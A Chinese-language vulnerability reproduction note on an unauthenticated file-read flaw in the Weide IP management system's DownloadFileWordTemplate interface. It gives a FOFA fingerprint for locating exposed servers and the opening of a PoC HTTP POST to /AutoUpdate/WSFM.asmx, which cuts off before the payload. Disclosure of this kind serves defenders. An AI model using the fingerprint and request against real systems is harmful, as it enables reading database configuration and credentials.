唯徳知识产权管理系统 DownloadFileWordTemplate 文件读取漏洞复现

0x01 产品简介

唯徳知识产权管理系统，由深圳市唯德科创信息有限公司精心打造，旨在为企业及代理机构提供全方位、高效、安全的知识产权管理解决方案。该系统集成了专利、商标、版权等知识产权的全面管理功能，并通过云平台实现远程在线办公，提升工作效率。是一款集知识产权申请、管理、维护、分析于一体的综合性管理平台。它覆盖了从项目挖掘、提案评审、案件管理、代理协同、费用管理到期限管理等各个环节，实现了知识产权业务的全流程电子化、智能化管理。

0x02 漏洞概述

唯徳知识产权管理系统 DownloadFileWordTemplate 接口存在文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：

body="JSCOMM/language.js"

0x04 漏洞复现

PoC

POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Cont